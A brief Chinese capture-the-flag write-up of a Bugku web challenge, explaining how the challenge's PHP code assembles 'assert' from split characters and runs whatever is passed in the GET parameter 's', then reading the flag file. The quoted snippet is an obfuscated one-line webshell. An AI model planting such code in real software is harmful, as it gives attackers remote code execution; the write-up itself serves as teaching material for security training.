Bugku-web(shell,成绩查询)
WriteUp1
题目信息

解题思路
打开页面,发现一片空白
观察题目中的描述

$poc="a#s#s#e#r#t"; # 定义一串字符串 $poc_1=explode("#",$poc); # explode() 按照 # 分割上面字符串,留下 ["a","s","s","e","r","t"] $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; # 拼接后 assert $poc_2($_GET['s']) # assert($_GET['s'])看到是get请求,说明可以在url中传递参数s

得到

分别为flaga15808abee46a1d5.txt和index.php
直接查看flaga15808abee46a1d5.txt即可

得到